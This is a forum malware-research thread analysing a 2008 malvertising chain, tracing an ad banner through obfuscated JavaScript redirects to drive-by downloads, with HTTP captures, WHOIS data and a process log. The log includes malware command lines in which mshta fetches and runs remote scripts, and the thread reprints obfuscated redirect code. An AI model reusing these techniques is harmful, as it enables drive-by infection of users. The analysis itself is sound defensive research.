Malicious Advertising
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
xrun.exe was reported to be seen on ebaumworld.com but unfortunately I didn’t get the file while visiting the website. I got curious because usually you get that file on crack sites. After starting up my VM, I headed to a well-known crack site. Surprise surprise, it’s triggered by an advertising banner so you might run into this one on different websites.

We will see later on that xrun.exe isn’t the only exploit. I actually got 3 alerts.
[screenshot: alert 1]
[screenshot: alert 2]
[screenshot: alert 3]
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.

<h4>Tracing back the origin of the file</h4>
I worked backwards to find its origin using the referer headers in the packets, but it will be far more comprehensive if we start with the initial advert.

It all begins with a placeholder for ads.clicksor.com adverts.
hxxp://ads.clicksor.com/serving/flash/160x600.swf – Nothing special because it’s simply a black placeholder for random adverts.

[screenshot: the 160x600 placeholder banner]
Once unpacked, we can take a look at the SWF file with Flare. Inside you can see the following function which displays the random banners:

CODE
// Flare decompilation of the ad-loading routine in 160x600.swf (ActionScript 2)
function displayBannerAd(cid, kid, nid, pnid, url, cdata, mtype, cpx, adWidth, adHeight, adType, bannerID, pid, sid, ch, uid) {
  if (cid == '-1' && kid == '-1') {
    // No campaign/keyword id: just send the current frame to the click URL
    getURL(url, '_self');
    return undefined;
  } else {
    if ((cpx == 'cpm' || cpx == 'cpa') && mtype == 'rich') {
      // Rich-media ad on a CPM/CPA deal: hand the frame off to showRichAd.php
      // on ads<pnid>.clicksor.com, passing every id through as a query argument
      getURL('http://ads' + ((pnid != 1) ? pnid : '') + '.clicksor.com/serving/showRichAd.php?cid=' + cid + '&kid=' + kid + '&nid=' + nid + '&mtype=' + mtype + '&cpx=' + cpx + '&adType=' + adType + '&bannerID=' + bannerID + '&pid=' + pid + '&sid=' + sid + '&ch=' + ch + '&uid=' + uid, '_self');
      return undefined;
    } else {
      // Plain banner: load the creative (cdata) into a fresh movie clip and make it clickable
      var container = createEmptyMovieClip('container', getNextHighestDepth());
      var v2 = new MovieClipLoader();
      this.onLoadInit = function (mc) {
        mc.onRelease = function () {
          getURL(url, '_blank');
        };
        container._width = adWidth;
        container._height = adHeight;
      };
      v2.addListener(this);
      v2.loadClip(cdata, container);
    }
  }
}

showRichAd.php is called with several arguments. They determine the advertisement that needs to be displayed.

CODE
GET /serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ads.clicksor.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:33 GMT
Server: Apache/2.2.3 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: CLICKSORUID=1204643013952; expires=Thu, 03-Apr-2008 15:03:33 GMT; path=/; domain=.clicksor.com
Content-Length: 207
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY leftmargin=0 topmargin=0><iframe src="http://creative.clicksor.com/46821/c1032706034.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="160" height="600"></iframe></BODY></HTML>

CODE
GET /46821/c1032706034.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: creative.clicksor.com
Connection: Keep-Alive
Cookie: CLICKSORUID=1204643013952
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 25 Sep 2006 14:19:20 GMT
ETag: "df51f1-111-e0362a00"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head><title>AD</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body topmargin="0" leftmargin="0">
        <script language="javascript" src="http://especialads.com/banner/serve.php?sv=160x600"></script>
        </body></html>

CODE
GET /banner/serve.php?sv=160x600 HTTP/1.1
Accept: */*
Referer: http://creative.clicksor.com/46821/c1032706034.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Content-Length: 945
Connection: close
Content-Type: text/html; charset=UTF-8
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
document.write(waofls(unescape('DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmRvY3VtZW50LmxvY2F0aW9uLmhyZWYgPSAiaHR0cDovL2VzcGVjaWFsYWRzLmNvbS9iYW5uZXIvc2hvdy5waHA/Y2lkPTExMzI0MjYmdGlkPTQ1MDExMDEzOTUmc3Y9MTYweDYwMCI7DQo8L3NjcmlwdD4NCg0K')));

Once decrypted, the code above gives us the next location:

CODE
<script language="javascript">
document.location.href = "http://especialads.com/banner/show.php?cid=1132426&tid=4501101395&sv=160x600";
</script>

CODE
GET /banner/show.php?cid=1132426&tid=4501101395&sv=160x600 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Set-Cookie: ebannsetc=1204643014; expires=Tue, 25-Mar-2008 15:03:34 GMT
Content-Length: 1484
Connection: close
Content-Type: text/html; charset=UTF-8
<script language="javascript">
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
document.write(waofls(unescape('[base64 payload omitted]')));
</script>

Decoded:

CODE
<style type="text/css"> body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } </style><body scroll="no">
<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=112963.10000007&subid=0&type=4" target="_blank"><IMG border="0" alt="8x8, Inc." src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=112963.10000007&subid=0&type=4&gridnum=9"></a>
<script language="javascript" src="http://www.awofkwy.net/placeholder-1354500-1929044418"></script>

The ad.linksynergy.com link will show us the advert image (see below), but right now we are only interested in the www.awofkwy.net/placeholder-1354500-1929044418 link. From here on I will only post screenshots of the code to avoid trouble.

[screenshot: www.awofkwy.net script]

Decoded:

[screenshot: decoded script]

First iframe ...

[screenshot: first iframe]

There are still encoded parts - see Unescape in the text - they are references to ADODB.Stream ActiveX controls. The most interesting part is the 2 links to our malware files.

[screenshot: links to the malware files]

The second iframe ...

[screenshot: second iframe]

The script is rather long, so I took only a snippet. We find mshta & srun.php again here. At the bottom, again, links to xrun.exe and xpre.exe.

[screenshot: snippet of the second iframe script]

Third iframe ...

[screenshot: third iframe]

Java exploit ... the code is very long, so I will only post 2 snippets that show the links.

[screenshot: Java exploit snippets]

Advertising image:

[screenshot: advertising image]

<h4>especialads.com - 83.216.217.242</h4>
ICANN Registrar: ENOM, INC.
Created: 2006-07-16
Expires: 2008-07-16

Name Server: DNS1.NAME-SERVICES.COM (has 4,321,272 domains)
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Whois Server: whois.enom.com

Server Type: Apache/2.2.3 (CentOS)
IP Location - Niederosterreich - Baden - Colobase Customer Allocation

Registration Service Provided By: NameAlerts, LLC
Contact:
Visit: http://www.NameAlerts.com

Domain name: especialads.com

Registrant Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Administrative Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Technical Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 16 Jul 2006 19:39:22
Expiration date: 16 Jul 2008 19:39:22

Websites:
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxrnet.net
  7. Awofkwy.net
  8. Especialads.com
  9. Iefjios.net
  10. Kasdfps.net
  11. Kiafjwo.net
  12. Netaddirect.com
  13. Netcrefer.net
  14. Netcshow.net
  15. Netsdir.net
  16. Snipenet.net
  17. Snipernet.biz
  18. Snipernet.us
  19. Sxload.net
  20. Xpseek.net
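As an added example (my own code, not from the thread), the chain above can be reconstructed statically, without loading any of the pages: a Python port of the obfuscated waofls() base64 decoder, plus a regex pass that pulls the next hop (iframe src, script src, or document.location.href) out of each captured response body. The response bodies and the base64 blob are copied from the captures in the thread; the URL-keyed dictionary and the function names are my own construction.

```python
"""Reconstruct the ad redirect chain statically from captured response bodies (added example)."""
import base64
import re
from typing import Dict, List

B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'


def waofls_decode(s: str) -> str:
    """Python port of the obfuscated waofls() routine: plain base64 with an odd trailing '=' check."""
    def at(j: int) -> str:
        return s[j] if 0 <= j < len(s) else ''   # JS charAt() past the end is ''

    def val(j: int) -> int:
        c = at(j)
        # JS: indexOf('') is 0; indexOf('=') is -1, which & 0xff becomes 255 (junk bits, stripped below)
        return (B64.find(c) if c else 0) & 0xff

    out, i = [], 0
    while i < len(s):
        bits = val(i) << 18 | val(i + 1) << 12 | val(i + 2) << 6 | val(i + 3)
        out.append(chr((bits & 0xff0000) >> 16) + chr((bits & 0xff00) >> 8) + chr(bits & 0xff))
        i += 4
    text = ''.join(out)
    if at(i - 2) == '=':        # '==' padding: the last two bytes are junk
        return text[:-2]
    if at(i - 1) == '=':        # '=' padding: the last byte is junk
        return text[:-1]
    return text


def decoder_matches_stdlib(blob: str) -> bool:
    """Sanity check: the hand-rolled decoder agrees with the standard library on a payload."""
    return waofls_decode(blob) == base64.b64decode(blob).decode('latin-1')


# serve.php/show.php only emit their real content through document.write() of a decoded blob.
DOCWRITE_RE = re.compile(r"document\.write\(waofls\(unescape\('([A-Za-z0-9+/=]+)'\)\)\)")
# Ways a captured body hands the browser on to the next URL.
HOP_RES = [
    re.compile(r'<iframe[^>]*\ssrc="([^"]+)"', re.I),
    re.compile(r'<script[^>]*\ssrc="([^"]+)"', re.I),
    re.compile(r'document\.location\.href\s*=\s*"([^"]+)"', re.I),
]


def next_hops(body: str) -> List[str]:
    """URLs a body would load or redirect to; document.write() payloads are decoded and searched too."""
    hops: List[str] = []
    for m in DOCWRITE_RE.finditer(body):
        # unescape() on a pure base64 string is a no-op, so decoding the blob directly is exact
        hops.extend(next_hops(waofls_decode(m.group(1))))
    for rx in HOP_RES:
        hops.extend(rx.findall(body))
    return hops


def follow_chain(captures: Dict[str, str], start: str) -> List[str]:
    """Follow the first hop of each captured body from `start` until a URL we have no capture for."""
    chain, url = [start], start
    while url in captures:
        hops = next_hops(captures[url])
        if not hops or hops[0] in chain:    # dead end or loop
            break
        url = hops[0]
        chain.append(url)
    return chain


# Base64 payload copied from the serve.php response in the thread.
BLOB = ('DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmRvY3VtZW50LmxvY2F0aW9uLmhyZWYgPSAiaHR0cDovL2VzcGVj'
        'aWFsYWRzLmNvbS9iYW5uZXIvc2hvdy5waHA/Y2lkPTExMzI0MjYmdGlkPTQ1MDExMDEzOTUmc3Y9MTYweDYwMCI7DQo8L3NjcmlwdD4NCg0K')
START = ('http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich'
         '&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843')
# Response bodies as captured in the thread (show.php is the already-decoded body), keyed by URL.
CAPTURES: Dict[str, str] = {
    START: '<HTML><BODY leftmargin=0 topmargin=0><iframe src="http://creative.clicksor.com/46821/c1032706034.html" '
           'FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="160" height="600"></iframe></BODY></HTML>',
    'http://creative.clicksor.com/46821/c1032706034.html':
        '<html><head><title>AD</title></head><body topmargin="0" leftmargin="0">\n'
        '<script language="javascript" src="http://especialads.com/banner/serve.php?sv=160x600"></script>\n'
        '</body></html>',
    'http://especialads.com/banner/serve.php?sv=160x600':
        "document.write(waofls(unescape('" + BLOB + "')));",
    'http://especialads.com/banner/show.php?cid=1132426&tid=4501101395&sv=160x600':
        '<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=112963.10000007&subid=0&type=4" '
        'target="_blank"><IMG border="0" alt="8x8, Inc." '
        'src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=112963.10000007&subid=0&type=4&gridnum=9"></a>\n'
        '<script language="javascript" src="http://www.awofkwy.net/placeholder-1354500-1929044418"></script>',
}

if __name__ == '__main__':
    for hop in follow_chain(CAPTURES, START):
        print(hop)
```

The walk stops at www.awofkwy.net because no capture of that body is on the page; the same function would continue through the iframes if their bodies were added to the dictionary.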
Kimberly
QUOTE(Kimberly @ Mar 4 2008, 08:21 PM)
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.
Speaking of junk ....
QUOTE
---Process Guard Log Started---

Thu 06 - 22:31:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xrun.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xrun.exe" ]
Thu 06 - 22:32:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:32:57 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:22 [EXECUTION] "c:\windows\system32\dllhost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\dllhost.exe /processid:{02d4b3f1-fd88-11d1-960d-00805fc79235} ]
Thu 06 - 22:33:29 [EXECUTION] "c:\windows\system32\msdtc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\msdtc.exe ]
Thu 06 - 22:33:40 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:44 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:37:53 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\xpre.exe" ]
Thu 06 - 22:38:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\snapsnet.exe" ]
Thu 06 - 22:38:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:38:16 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1280]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" ]
Thu 06 - 22:38:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\rasesnet.exe" ]
Thu 06 - 22:38:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3728]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:38:57 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3744]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:39:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\wavvsnet.exe" ]
Thu 06 - 22:39:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3312]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:39:35 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3340]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:39:50 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1916]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:40:15 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\yazzsnet.exe" ]
Thu 06 - 22:40:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1484]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:40:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [220]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:40:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:31 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:39 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xrun.exe" >> nul ]
Thu 06 - 22:41:16 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2516]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:41:40 [EXECUTION] "c:\temp\txnog4220.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\idlo01\idlo011065.exe" [2252]
[EXECUTION] Commandline - [ c:\temp\txnog4220.exe ]
Thu 06 - 22:41:43 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3292]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:52 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1216]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:42:01 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2816]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:42:03 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3040]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:42:06 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:43:08 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [1248]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:43:21 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:44:02 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe ]
Thu 06 - 22:44:07 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2332]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:08 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3852]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:10 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:11 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1256]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:14 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3940]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:15 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2268]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:35 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winfix.php ]
Thu 06 - 22:45:00 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:45:08 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:10 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
